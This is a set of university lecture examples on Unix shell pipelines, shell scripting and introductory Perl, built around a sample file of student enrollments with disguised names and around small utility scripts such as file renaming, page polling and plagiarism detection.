    SART9739 Multimedia Computing Elective
    SDES1106 Design and Computers 1
    SDES1110 Design and Computers 2
    SDES1111 Integrated Design Computing 1
    SDES1211 Integrated Design Computing 2
    SDES2107 Design and Computers 3
    SDES2115 Design and Computers 2B
    SDES3107 Design and Computers 4
    SDES3173 Advanced Computer Graphics
    SDES4103 Design and Computers 4
    SDES6714 Intro 3D Computer Aided Design
    SLSP2902 Computers and Comm.
    SOCI3401 Computer Analysis of Social Data
    SOCI3408 Computer Analysis of Social Data
    SOMA1681 Intro Multimedia Computing
    SOMA1810 Introduction to Computing
    SOMA2402 Tangible Computing
    SOMA2681 Advanced Multimedia Computing
    SOMA2811 Multimedia Computing Workshop
    SURV1111 Introduction To Computing
    SURV2111 Principles of Computer Processin
    SURV2122 Computer Graphics 1
    SURV4111 Data Analysis & Computing 1
    SURV5111 Data Analysis & Computing 2
    SURV5122 Computer Graphics 2
    SURV6121 Computer Graphics
    TABL1002 Computer Information Systems
    TEDG1101 Computers in Education
    TEDG1106 Computer-based Resources: Design
    TEDG1107 Managing With Computers in Schoo
    TEDG1112 Computers - Gifted & Talented St
    TEDG1113 Computer Control Technology in E
    TEED1134 Fundamentals of Computing
    TEED2119 Computers & People
    TELE9302 Computer Networks
    TEXT2501 Computing Applications
    ZEIT1110 Computer Games
    ZEIT2102 Computer Technology
    ZEIT2305 Computer Games
    ZEIT3113 Computer Languages & Algorithm
    ZEIT3304 Computing Proj - Info Sys
    ZEIT3307 Computer Games
    ZEIT8020 Computer Network Operations
    ZEIT8028 Computer Forensics
    ZEIT9100 Computer Science Research F/T
    ZEIT9101 Computer Science Research P/T
    ZGEN2300 Computers in Society
    ZGEN2301 Computer Games
    ZITE1001 Computer Tools for Engineers
    ZITE1101 Intro to Computer Science
    ZITE2101 Computer Languages & Algorithm
    ZITE2102 Computer Technology
    ZITE3101 Computing Proj - Comp Sci
    ZITE3105 Human Computer Interaction
    ZITE3106 Interactive Computer Graphics
    ZITE3113 Computer Languages & Algorithm
    ZITE3211 Microcomputer Interfacing
    ZITE3304 Computing Proj - Info Sys
    ZITE4101 Computer Sci 4 (Comb Hons) F/T
    ZITE4102 Computer Sci 4 (Comb Hon) P/T
    ZITE4103 Computer Science 4 (Hons) F/T
    ZITE4104 Computer Science 4 (Hons) P/T
    ZITE8103 Computer Graphics
    ZITE8104 Computer Security
    ZITE8105 Computer Speech Processing
    ZITE9100 Computer Science Research F/T
    ZITE9101 Computer Science Research P/T
    
    The last ones are from the Computer Science school at ADFA.
  2. Consider a file called enrollments which contains data about student enrollment in courses. There is one line for each student enrolled in a course:
    ls -l enrollments
    -rw-r--r-- 1 cs2041 cs2041 855297 Oct 16 22:02 enrollments
    
    wc enrollments
      7569  42802 855297 enrollments
    
    head enrollments
    COMP1511|5013566|Xin, Mackenzie Darren                             |3648/2|COMPI1 MTRNAH|071.800|17s2|19910428|M
    COMP9902|5079970|Park, Xue Hannah Vanessa                          |8543  |ELECAH       |079.333|17s2|19900209|F
    COMP1511|5059072|Chung, Michael Jia Tianyu                         |3778/1|COMPCS       |057.250|17s2|19990801|M
    COMP1521|5060774|Lim, Stephanie Lauren                             |3785/1|COMPA1       |000.000|17s2|19890113|F
    COMP1531|5060774|Lim, Stephanie Lauren                             |3785/1|COMPA1       |000.000|17s2|19890113|F
    COMP2521|5060774|Lim, Stephanie Lauren                             |3785/1|COMPA1       |000.000|17s2|19890113|F
    COMP9020|5060538|Bi, Samuel Shiyu                                  |6021  |COMPA1       |078.125|17s2|19911004|M
    COMP9021|5060538|Bi, Samuel Shiyu                                  |6021  |COMPA1       |078.125|17s2|19911004|M
    COMP9902|5072116|Hu, Kai Zhi Patrick                               |3707/1|SENGAH       |070.750|17s2|19930424|M
    COMP1511|5036926|Fang, Rebecca Lauren                              |8543  |COMPCS       |000.000|17s2|20000921|F
    
    The following commands count how many students are enrolled in COMP2041 or COMP9041. The course IDs differ only in one character, so a character class is used instead of alternation.

    The first version below is often ferred because initially you may want to know "how many xxx", then having found that out the next question might be, "well give me a sample of 10 or so of them". Then it's a simple matter of replacing wc by head.

    egrep '^COMP[29]041' enrollments | wc -l
    511
    
    egrep -c '^COMP[29]041' enrollments
    511
    
    The last field field in the enrollment file records the student's gender. This command counts the number of female students enrolled in the courses.
    egrep '^COMP[29]041' enrollments | egrep '|F$' | wc -l
    511
    
    Not a very good gender balance, is it?

    By the way, the two egreps could have been combined into one. How?

    This command will give a sorted list of course codes:

    cut -d'|' -f1 enrollments | sort | uniq
    COMP1400
    COMP1511
    COMP1521
    COMP1531
    COMP2041
    COMP2121
    COMP2521
    COMP3151
    COMP3161
    COMP3222
    COMP3331
    COMP3421
    COMP3431
    COMP3511
    COMP3601
    COMP3901
    COMP4121
    COMP4161
    COMP4336
    COMP4418
    COMP4904
    COMP4905
    COMP4920
    COMP4930
    COMP4931
    COMP4941
    COMP6445
    COMP6714
    COMP6733
    COMP6741
    COMP6771
    COMP6845
    COMP9020
    COMP9021
    COMP9024
    COMP9032
    COMP9041
    COMP9151
    COMP9161
    COMP9222
    COMP9242
    COMP9311
    COMP9313
    COMP9321
    COMP9322
    COMP9323
    COMP9331
    COMP9336
    COMP9415
    COMP9418
    COMP9431
    COMP9444
    COMP9511
    COMP9517
    COMP9596
    COMP9900
    COMP9901
    COMP9902
    COMP9945
    
    The student records system known to users as myUNSW is built on top of a large US product known as PeopleSoft (the company was taken over by Oracle in 2004). On a scale of 1 to 10 the quality of the design of this product is about 3. One of its many flaws is its insistence that everybody must have two names, a "Last Name" and a "First Name", neither of which can be empty. To signify that a person has only a single name (common in Sri Lanka, for example), the system stores a dot character in the "First Name" field. The enrollments file shows the data as stored in the system, with a comma and space separating the component names. It has some single-named people (note that the names themselves have been disguised):
    egrep ', \.' enrollments
    COMP1511|5007185|Nguyen, .                                         |3764/1|COMPCS       |000.000|17s2|19861014|M
    COMP3331|5071779|Yuan, .                                           |3785/2|COMPCS       |072.063|17s2|19901016|M
    COMP3511|5071779|Yuan, .                                           |3785/2|COMPCS       |072.063|17s2|19901016|M
    COMP4920|5071779|Yuan, .                                           |3785/2|COMPCS       |072.063|17s2|19901016|M
    COMP9021|5054494|Dang, .                                           |8543  |ELECAH PHYSC1|000.000|17s2|19931117|M
    COMP3421|5072547|Zhou, .                                           |3978/2|COMPA1       |068.167|17s2|19870503|M
    COMP3431|5072547|Zhou, .                                           |3978/2|COMPA1       |068.167|17s2|19870503|M
    COMP3601|5072547|Zhou, .                                           |3978/2|COMPA1       |068.167|17s2|19870503|M
    COMP9901|5065745|Lo, .                                             |8543  |COMPAS COMPIS|082.545|17s2|19981128|M
    COMP9024|5099838|Chen, .                                           |3978/1|COMPCS       |072.500|17s2|19980127|F
    COMP9041|5099838|Chen, .                                           |3978/1|COMPCS       |072.500|17s2|19980127|F
    COMP9321|5099838|Chen, .                                           |3978/1|COMPCS       |072.500|17s2|19980127|F
    COMP9331|5099838|Chen, .                                           |3978/1|COMPCS       |072.500|17s2|19980127|F
    
    What would have happened if we forgot the backslash?

    If we wanted to know how many different students there were of this type rather than all enrollments, just cut out the second field (student ID) and use uniq. It's not necessary to sort the data in this case only because the data is clustered, that is, all equal values are adjacent although they're not necessarily sorted.

    egrep ', \.' enrollments | cut -d'|' -f2 | uniq | wc
          6       6      48
    
  3. Now let us turn our attention from students and courses to programs. The enrollments file, as well as linking a student to the courses they're taking, also links them to the program (degree) that they are currently enrolled in. Consider that we want to find out the program codes of the students taking COMP2041. The following pipeline will do this:
    egrep 'COMP[29]041' enrollments | cut -d'|' -f4 | cut -d/ -f1  |sort | uniq
    1540  
    1650  
    2765  
    3133
    3436
    3529
    3554
    3564
    3645
    3647
    3648
    3707
    3710
    3711
    3715
    3725
    3731
    3736
    3761
    3762
    3764
    3767
    3768
    3772
    3778
    3781
    3782
    3784
    3785
    3789
    3946
    3947
    3948
    3956
    3959
    3961
    3962
    3967
    3968
    3969
    3970
    3978
    3979
    3983
    3984
    4515
    5543  
    6001  
    6021  
    7543  
    8009
    8338  
    8543  
    8621  
    
    If we want to know how many students come from each program, ordered from most common program to least common program, try this:
    egrep COMP[29]041 enrollments | cut -d'|' -f4 | cut -d/ -f1 | sort | uniq -c | sort -nr
        175 8543  
         76 3707
         38 3978
         26 3778
         17 1650  
         14 7543  
         11 5543  
         11 3784
         10 3967
          9 3772
          9 3764
          9 3645
          8 3983
          6 3781
          6 3768
          5 6021  
          5 3969
          5 3959
          5 3715
          4 3970
          4 3785
          4 3762
          4 3736
          3 6001  
          3 4515
          3 3946
          3 3782
          3 3767
          3 3725
          2 3956
          2 3948
          2 3789
          2 3761
          2 3711
          2 3648
          2 3647
          1 8621  
          1 8338  
          1 8009
          1 3984
          1 3979
          1 3968
          1 3962
          1 3961
          1 3947
          1 3731
          1 3710
          1 3564
          1 3554
          1 3529
          1 3436
          1 3133
          1 2765  
          1 1540  
    
    Note that a tab is usually inserted between the count and the data, but not all implementations of the uniq command ensure this.
  4. Consider a file called program_codes that contains the code and name of each program offered at UNSW (excluding research programs):

    wc program_codes
     1798  6466 46572 program_codes
    
    head program_codes
    0350 Medicine (Prince Henry/POW)
    0351 Medicine (SWS Clinical School)
    0352 Medicine (St George)
    0353 Medicine (St Vincent's)
    0360 Pathology
    0370 Physiology and Pharmacology
    0375 Rural Health
    0380 Obstetrics and Gynaecology
    0390 Psychiatry
    0400 Surgery (Prince Henry/POW)
    
    We can use this file to give more details of the programs that COMP2041 students are taking, if some users don't want to deal with just course codes.
    egrep COMP[29]041 enrollments | cut -d'|' -f4 | cut -d/ -f1 |sort | uniq | join - program_codes
    1540  Economics
    1650  Computer Science and Eng
    2765  Computer Science and Eng
    3133 Mat Sci and Eng Hons/BiomedEng
    3436 Music
    3529 Commerce/Science
    3554 Commerce (Co-op)
    3564 Economics / Science (Adv Math)
    3645 Computer Engineering
    3647 Bioinformatics
    3648 Software Engineering
    3707 Engineering (Honours)
    3710 Mechanical & Manufacturing Eng
    3711 Mechanical & Manf Eng/Science
    3715 Engineering/Commerce
    3725 Electrical Engineering/Science
    3731 BE ME Electrical Engineering
    3736 BE (Hons) ME Elec Eng
    3761 Adv Math (Hons) / Eng (Hons)
    3762 AdvSci(Hons)/Engineering(Hons)
    3764 Engineering (Hons)/Commerce
    3767 Engineering (Hons) / Science
    3768 Eng (Hons) / MBiomedE
    3772 Engineering(Hons)/Computer Sci
    3946 Adv Maths (Hons)/Computer Sci
    3947 Science / Arts
    3956 Advanced Mathematics (Honours)
    3961 Engineering (Honours) / Arts
    3962 Advanced Science (Honours)
    3967 Commerce / Computer Science
    3968 Computer Science / Arts
    3969 Media Arts (Hons) / Comp Sci
    3970 Science
    3978 Computer Science
    3979 Information Systems
    3983 Science/Computer Science
    3984 Computer Science / Law
    4515 Comp Sci & Eng (Honours)
    5543  Information Technology
    6001  Study Abroad Program
    6021  Exchange Program
    7543  Computing
    8009 Technology and Innovation Mgmt
    8338  Engineering Science
    8543  Information Technology
    8621  Engineering
    
    We can combine the enrollment counts (for both courses) with the program titles to produce a self-descriptive tally. It's even better if it's in decreasing order of popularity, so after joining the tallies with the program titles, re-sort the composite data:
    egrep 'COMP[29]041' enrollments | cut -d'|' -f4 | cut -d/ -f1 |sort | uniq -c | join -1 2 -a 1 - program_codes  | sort -k2rn
    8543 175  Information Technology
    3707 76 Engineering (Honours)
    3978 38 Computer Science
    3778 26
    1650 17  Computer Science and Eng
    7543 14  Computing
    3784 11
    5543 11  Information Technology
    3967 10 Commerce / Computer Science
    3645 9 Computer Engineering
    3764 9 Engineering (Hons)/Commerce
    3772 9 Engineering(Hons)/Computer Sci
    3983 8 Science/Computer Science
    3768 6 Eng (Hons) / MBiomedE
    3781 6
    3715 5 Engineering/Commerce
    3959 5
    3969 5 Media Arts (Hons) / Comp Sci
    6021 5  Exchange Program
    3736 4 BE (Hons) ME Elec Eng
    3762 4 AdvSci(Hons)/Engineering(Hons)
    3785 4
    3970 4 Science
    3725 3 Electrical Engineering/Science
    3767 3 Engineering (Hons) / Science
    3782 3
    3946 3 Adv Maths (Hons)/Computer Sci
    4515 3 Comp Sci & Eng (Honours)
    6001 3  Study Abroad Program
    3647 2 Bioinformatics
    3648 2 Software Engineering
    3711 2 Mechanical & Manf Eng/Science
    3761 2 Adv Math (Hons) / Eng (Hons)
    3789 2
    3948 2
    3956 2 Advanced Mathematics (Honours)
    1540 1  Economics
    2765 1  Computer Science and Eng
    3133 1 Mat Sci and Eng Hons/BiomedEng
    3436 1 Music
    3529 1 Commerce/Science
    3554 1 Commerce (Co-op)
    3564 1 Economics / Science (Adv Math)
    3710 1 Mechanical & Manufacturing Eng
    3731 1 BE ME Electrical Engineering
    3947 1 Science / Arts
    3961 1 Engineering (Honours) / Arts
    3962 1 Advanced Science (Honours)
    3968 1 Computer Science / Arts
    3979 1 Information Systems
    3984 1 Computer Science / Law
    8009 1 Technology and Innovation Mgmt
    8338 1  Engineering Science
    8621 1  Engineering
    
    Note the curious extra space before the title of programs 8682 and 8684. It took me a while to work it out, can you? (Hint: how are the programs shown in the enrollment file?) Suggest an appopriate change to the pipeline.
  5. Lecture exercises on wc:
    1. how many different programs does UNSW offer?
      wc -l program_codes
      1798 program_codes
      
    2. how many times was WebCMS accessed?
      wc -l access_log
      59779 access_log
      
    3. how many students are studying in CSE?
      wc -l enrollments
      7569 enrollments
      

      The above solutions assume that we're talking about total enrollments. If the question actually meant how many distinct indivduals are studying courses offered by CSE, then we'd answer it as:

      cut -d'|' -f2 enrollments | sort | uniq | wc -l
      3791
      
    4. how many words are there in the book?
      wc -w book
      60428 book
      
    5. how many lines are there in the story?
      wc -l story
      87 story
      

Shell:lecture slideslecture notes
External resources: Shell commands for power users.


A simple shell script demonstrating access to arguments.

echo My name is $0
echo My process number is $$
echo I have $# arguments
echo My arguments separately are $*
echo My arguments together are "$@"
echo My 5th argument is "'$5'"

l [file|directories...] - list files

Short Shell scripts can be used for convenience.

Note: "$@" like $* expands to the arguments to the script, but preserves the integrity of each argument if it contains spaces.

ls -las "$@"

Count the number of time each different word occurs in the files given as arguments, e.g. word_frequency.sh dracula.txt

sed 's/ /\n/g' "$@"|      # convert to one word per line
tr A-Z a-z|               # map uppercase to lower case
sed "s/[^a-z']//g"|       # remove all characters except a-z and '
egrep -v '^$'|            # remove empty lines
sort|                     # place words in alphabetical order
uniq -c|                  # use uniq to count how many times each word occurs
sort -n                   # order words in frequency of occurrance

Change the names of the specified files to lower case.

Note the use of test to check if the new filename differs from the old.

The perl utility rename provides a more general alternative.

Note without the double quotes below filenames containing spaces would be handled incorrectly.

Note also the use of -- to avoid mv interpreting a filename being with - as an option

Although a files named -n or -e will break the script because echo will treat them as an option,

if test $# = 0
then
    echo "Usage $0: <files>" 1>&2
    exit 1
fi

for filename in "$@"
do
    new_filename=`echo "$filename" | tr A-Z a-z`
    test "$filename" = "$new_filename" && continue
    if test -r "$new_filename"
    then
        echo "$0: $new_filename exists" 1>&2
    elif test -e "$filename"
    then
        mv -- "$filename" "$new_filename"
    else
        echo "$0: $filename not found" 1>&2
    fi
done

Repeatedly download a specified web page until a specified regexp matches its source then notify the specified email address.

For example:

repeat_seconds=300  #check every 5 minutes

if test $# = 3
then
    url=$1
    regexp=$2
    email_address=$3
else
    echo "Usage: $0 <url> <regex>" 1>&2
    exit 1
fi

while true
do
    if wget -O- -q "$url"|egrep "$regexp" >/dev/null
    then
        echo "Generated by $0" | mail -s "$url now matches $regexp" $email_address
        exit 0
    fi
    sleep $repeat_seconds
done

Print the integers 1..n if 1 argument given.

Print the integers n..m if 2 arguments given.

if test $# = 1
then
    start=1
    finish=$1
elif test $# = 2
then
    start=$1
    finish=$2
else
    echo "Usage: $0 <start> <finish>" 1>&2
    exit 1
fi

for argument in "$@"
do
    if echo "$argument"|egrep -v '^-?[0-9]+$' >/dev/null
    then
        echo "$0: argument '$argument' is not an integer" 1>&2
        exit 1
    fi
done

number=$start
while test $number -le $finish
do
    echo $number
    number=`expr $number + 1`    # or number=$(($number + 1))
done

Print the integers 1..n if 1 argument given.

Print the integers n..m if 2 arguments given.

if (($# == 1))
then
    start=1
    finish=$1
elif (($# == 2))
then
    start=$1
    finish=$2
else
    echo "Usage: $0 <start> <finish>" 1>&2
    exit 1
fi

for argument in "$@"
do
    if echo "$argument"|egrep -v '^-?[0-9]+$' >/dev/null
    then
        echo "$0: argument '$argument' is not an integer" 1>&2
        exit 1
    fi
done

number=$start
while ((number <= finish))
do
    echo $number
    number=$((number + 1))
done

Run as plagiarism_detection.simple_diff.sh <files>

Report if any of the files are copies of each other

The use of diff -iw means changes in white-space or case won't affect comparisons

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break
        if diff -i -w "$file1" "$file2" >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done

Improved version of plagiarism_detection.simple_diff.sh

The substitution s/\/\/.*// removes // style C comments.

This means changes in comments won't affect comparisons.

Note use of temporary files

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$


for file1 in "$@"
do
    for file2 in "$@"
    do
        if test "$file1" = "$file2"
        then
            break # avoid comparing pairs of assignments twice
        fi
        sed 's/\/\/.*//' "$file1" >$TMP_FILE1
        sed 's/\/\/.*//' "$file2" >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2

Improved version of plagiarism_detection.comments.sh

This version converts C strings to the letter 's' and it converts identifiers to the letter 'v'.

Hence changes in strings & identifiers won't prevent detection of plagiarism.

The substitution s/"["]*"/s/g changes strings to the letter 's'

This pattern won't match a few C strings which is fine for our purposes

The s/[a-zA-Z_][a-zA-Z0-9_]*/v/g changes all variable names to 'v' which means changes to variable names won't affect comparison.

Note this also may change function names, keywords etc.

This is fine for our purposes.

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$
substitutions='s/\/\/.*//;s/"[^"]"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break # don't compare pairs of assignments twice
        sed "$substitutions" "$file1" >$TMP_FILE1
        sed "$substitutions" "$file2" >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2

Improved version of plagiarism_detection.identifiers.sh

Note the use of sort so line reordering won't prevent detection of plagiarism.

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$
substitutions='s/\/\/.*//;s/"[^"]"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break # don't compare pairs of assignments twice
        sed "$substitutions" "$file1"|sort >$TMP_FILE1
        sed "$substitutions" "$file2"|sort >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2

Improved version of plagiarism_detection.reordering.sh

Note use md5sum to calculate a Cryptographic hash of the modified file http://en.wikipedia.org/wiki/MD5 and then use sort && uniq to find files with the same hash

This allows execution time linear in the number of files

substitutions='s/\/\/.*//;s/"[^"]"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file in "$@"
do
    echo `sed "$substitutions" "$file"|sort|md5sum` $file
done|
sort|
uniq -w32 -d --all-repeated=separate|
cut -c36-

Printall occurances of executable programs with the specified names in $PATH

Note use of tr to produce a space-separated list of directories suitable for a for loop.

Breaks if directories contain spaces (fixing this left as an exercise).

if test $# = 0
then
    echo "Usage $0: <program>" 1>&2
    exit 1
fi

for program in "$@"
do
    program_found=''
    for directory in `echo "$PATH" | tr ':' ' '`
    do
        f="$directory/$program"
        if test -x "$f"
        then
            ls -ld "$f"
            program_found=1
        fi
    done
    if test -z $program_found
    then
        echo "$program not found"
    fi
done

Print all occurances of executable programs with the specified names in $PATH

Note use of tr to produce a list of directories one per line suitable for a while loop.

Won't work if directories contain spaces (fixing this left as an exercise)

if test $# = 0
then
    echo "Usage $0: <program>" 1>&2
    exit 1
fi

for program in "$@"
do
    echo "$PATH"|
    tr ':' '\n'|
    while read directory
    do
        f="$directory/$program"
        if test -x "$f"
        then
            ls -ld "$f"
        fi
    done|
    egrep '.' || echo "$program not found"
done

Print all occurances of executable programs with the specified names in $PATH

Note use of tr to produce a list of directories one per line suitable for a while loop.

Won't work if directories contain new-lines (fixing this left as an exercise)

if test $# = 0
then
    echo "Usage $0: <program>" 1>&2
    exit 1
fi
for program in "$@"
do
    n_path_components=`echo $PATH|tr -d -c :|wc -c`
    index=1
    while test $index -le $n_path_components
    do
        directory=`echo "$PATH"|cut -d: -f$index`
        f="$directory/$program"
        if test -x "$f"
        then
            ls -ld "$f"
            program_found=1
        fi
        index=`expr $index + 1`
    done
    test -n $program_found || echo "$program not found"
done

Perl Intro:lecture slideslecture notes
External resources: perl.org documentation, FAQs & tutorialsa quick referencecourse lecture notesCSE CPAN mirror


compute Pythagoras' Theorem

print "Enter x: ";
$x = <STDIN>;
chomp $x;
print "Enter y: ";
$y = <STDIN>;
chomp $y;
$pythagoras = sqrt $x * $x + $y * $y;
print "The square root of $x squared + $y squared is $pythagoras\n";

Read numbers until end of input (or a non-number) is reached then print the sum of the numbers

$sum = 0;
while ($line = <STDIN>) {
    $line =~ s/^\s*//; # remove leading white space
    $line =~ s/\s*$//; # remove leading trailing white space
    # Test if string looks like an integer or real (scientific notation not handled!)
    if ($line !~ /^\d[.\d]*$/) {
        last;
    }
    $sum += $line;
}
print "Sum of the numbers is $sum\n";

Simple example reading a line of input and examining characters

printf "Enter some input: ";
$line = <STDIN>;
if (!defined $line) {
	die "$0: could not read any characters\n";
}
chomp $line;
$n_chars = length $line;
print "That line contained $n_chars characters\n";
if ($n_chars > 0) {
	$first_char = substr($line, 0, 1);
	$last_char = substr($line, $n_chars - 1, 1);
	print "The first character was '$first_char'\n";
	print "The last character was '$last_char'\n";
}

Reads lines of input until end-of-input

Print snap! if two consecutive lines are identical

print "Enter line: ";
$last_line = <STDIN>;
print "Enter line: ";
while ($line = <STDIN>) {
	if ($line eq $last_line) {
		print "Snap!\n";
	}
    $last_line = $line;
	print "Enter line: ";
}

create a string of size 2^n by concatenation

die "Usage: $0 <n>\n" if @ARGV != 1;
$n = 0;
$string = '@';
while ($n  < $ARGV[0]) {
    $string = "$string$string";
    $n++;
}
printf "String of 2^%d = %d characters created\n", $n, length $string;

Perl implementation of /bin/echo always writes a trailing space

foreach $arg (@ARGV) {
    print $arg, " ";
}
print "\n";

Perl implementation of /bin/echo

print "@ARGV\n";

Perl implementation of /bin/echo

print join(" ", @ARGV), "\n";

Perl Arrays:lecture slideslecture notes


while (1) {
    print "Enter array index: ";
    $n = <STDIN>;
    if (!$n) {
        last;
    }
    chomp $n;
    $a[$n] = 42;
    print "Array element $n now contains $a[$n]\n";
    printf "Array size is now %d\n", $#a+1;
}

sum integers supplied as command line arguments no check that aguments are numeric

$sum = 0;
foreach $arg (@ARGV) {
	$sum += $arg;
}
print "Sum of the numbers is $sum\n";

Count the number of lines on standard input.

$line_count = 0;
while (1) {
    $line = <STDIN>;
    last if !$line;
    $line_count++;
}
print "$line_count lines\n";

Count the number of lines on standard input - slightly more concise

$line_count = 0;
while (<STDIN>) {
    $line_count++;
}
print "$line_count lines\n";

Count the number of lines on standard input - using backwards while to be really concise

$line_count = 0;
$line_count++ while <STDIN>;
print "$line_count lines\n";

Count the number of lines on standard input. read the input into an array and use the array size.

@lines = <STDIN>;
print $#lines+1, " lines\n";

Count the number of lines on standard input.

Assignment to () forces a list context and hence reading all lines of input.

The special variable $. contains the current line number

() = <STDIN>;
print "$. lines\n";

Print lines read from stdin in reverse order.

In a C-style

while ($line = <STDIN>) {
    $line[$line_number++] = $line;
}


for ($line_number = $#line; $line_number >= 0 ; $line_number--) {
    print $line[$line_number];
}

Print lines read from stdin in reverse order.

Using <> in a list context

@line = <STDIN>;
for ($line_number = $#line; $line_number >= 0 ; $line_number--) {
    print $line[$line_number];
}

Print lines read from stdin in reverse order.

Using <> in a list context & reverse

@lines = <STDIN>;
print reverse @lines;


Print lines read from stdin in reverse order.

Using <> in a list context & reverse

print reverse <STDIN>;


Print lines read from stdin in reverse order.

Using push & pop

while ($line = <STDIN>) {
    push @lines, $line;
}
while (@lines) {
    my $line = pop @lines;
    print $line;
}

Print lines read from stdin in reverse order.

More succintly with pop

@lines = <STDIN>;
while (@lines) {
    print pop @lines;
}

Print lines read from stdin in reverse order.

Using unshift

while ($line = <STDIN>) {
    unshift @lines, $line;
}
print @lines;

Simple cp implementation using line by line I/O

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
open my $out, '>', $outfile or die "Cannot open $outfile: $!";

while ($line = <$in>) {
    print $out $line;
}

close $in;
close $out;
exit 0;

Simple cp implementation using line by line I/O relying on the default variable $_

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
open my $out, '>', $outfile or die "Cannot open $outfile: $!";

# loop could also be written in one line:
# print OUT while <IN>;

while (<$in>) {
    print $out;
}

close $in;
close $out;
exit 0;

Simple cp implementation reading entire file into array note that <> returns an array of lines in a list context (in a scalar context it returns a single line)

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
@lines = <$in>;
close $in;

open my $out, '>', $outfile or die "Cannot open $outfile: $!";
print $out @lines;
close $out;

exit 0;

Simple cp implementation via system!

Will break if filenames contain single quotes

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

exit system "/bin/cp '$infile' '$outfile'";

Simple cp implementation reading entire file into array $/ contains the line separator for Perl if it is undefined we can slurp an entire file into a scalar variable with a single read

die "Usage: cp <infile> <outfile>\n" if @ARGV != 2;
$infile = shift @ARGV;
$outfile = shift @ARGV;

undef $/;
open my $in, '<', $infile or die "Cannot open $infile: $!";
$contents = <$in>;
close $in;

open my $out, '>', $outfile or die "Cannot open $outfile: $!";
print $out $contents;
close $out;

exit 0;

Reads lines of input until end-of-input

Print snap! if a line has been seen previously

while (1) {
	print "Enter line: ";
	$line = <STDIN>;
	if (!defined $line) {
		last;
	}
	if ($seen{$line}) {
		print "Snap!\n";
	}
	$seen{$line}++;
}

More concise version of snap_memory.0.pl

while (1) {
	print "Enter line: ";
	$line = <STDIN>;
	last if !defined $line;
	print "Snap!\n" if $seen{$line};
	$seen{$line} = 1;
}

run as ./expel_student mark_deductions.txt find the student with the largest mark deductions expell them

while ($line = <>) {
    chomp $line;
    $line =~ s/^"//;
    $line =~ s/"$//;
    my ($name,$offence,$date,$penalty);
    ($name,$offence,$date,$penalty) = split /"\s*,\s*"/, $line;
    $penalty =~ s/[^0-9]//g;
    $deduction{$name} += $penalty;
}

$worst = 0;
foreach $student (keys %deduction) {
    $penalty = $deduction{$student};
    if ($penalty > $worst) {
        $worst_student = $student;
        $worst = $penalty;
    }
}
print "Expel $worst_student who had $worst marks deducted\n";

Print the nth word on every line of input files/stdin output is piped through fmt to make reading easy

die "Usage: $0 <n> <files>\n" if !@ARGV;
$nth_word = shift @ARGV;
open my $f, '|-', "fmt -w 40" or die "Can not run fmt: $!\n";
while ($line = <>) {
    chomp $line;
    @words = split(/ /, $line);
    print $f "$words[$nth_word]\n" if $words[$nth_word];
}
close $f;

Perl Regex:lecture slideslecture notes
External resources: regex summary


For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in a new file which is then renamed to replace the old file

foreach $filename (@ARGV) {
    $tmp_filename = "$filename.new";
    die "$0: $tmp_filename already exists" if -e "$tmp_filename";
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    open my $g, '>', $tmp_filename or die "$0: Can not open $tmp_filename : $!";
    while ($line = <$f>) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
        $line =~ s/Zaphod/Harry/g;
        print $g $line;
    }
    close $f;
    close $g;
    rename "$tmp_filename", $filename or die "$0: Can not rename file";
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in an array then the file is over-written

foreach $filename (@ARGV) {
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    $line_count = 0;
    while ($line = <$f>) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
        $line =~ s/Zaphod/Harry/g;
        $new_lines[$line_count++] = $line;
    }
    close $f;
    open my $g, '>', ">$filename" or die "$0: Can not open $filename : $!";
    print $g @new_lines;
    close $g;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in an array then the file is over-written

foreach $filename (@ARGV) {
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    @lines = <$f>;
    close $f;

    # note loop variable $line is aliased to array elements
    # changes to it change the corresponding array element
    foreach $line (@lines) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
